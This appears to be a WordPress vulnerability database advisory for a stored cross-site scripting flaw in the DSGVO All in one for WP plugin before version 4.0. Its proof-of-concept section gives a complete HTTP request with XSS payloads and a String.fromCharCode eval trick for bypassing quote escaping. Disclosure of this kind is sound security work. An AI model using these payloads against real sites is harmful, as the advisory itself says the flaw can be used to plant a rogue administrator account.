WordPress Plugin Vulnerabilities
DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
Description
The dsgvoaio_write_log AJAX action of the plugin did not sanitise or escape some POST parameter submitted before outputting them in the Log page in the administrator dashboard (wp-admin/admin.php?page=dsgvoaiofree-show-log). This could allow unauthenticated attackers to gain unauthorised access by using an XSS payload to create a rogue administrator account, which will be trigged when an administrator will view the logs.
Proof of Concept
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 180 action=dsgvoaio_write_log&id=%3cimg%20src%20onerror%3dalert(%2fXSS-Id%2f)%3e&state=true&key=wordpressmain&name=All&allvalue%5B%5D=%3cimg%20src%20onerror%3dalert(%2fXSS-value%2f)%3e Payload will be processed by update_option(). This will lead into escaped single and double qoutes. You can use the String.fromCharCode string construction to bypass this limitation, such as %3Cimg%20src%3D1%20style%3Ddisplay%3Anone%20onerror%3Deval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C49%2C50%2C41))%3E
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-07 (about 3 years ago)
Added
2021-05-07 (about 3 years ago)
Last Updated
2021-05-08 (about 3 years ago)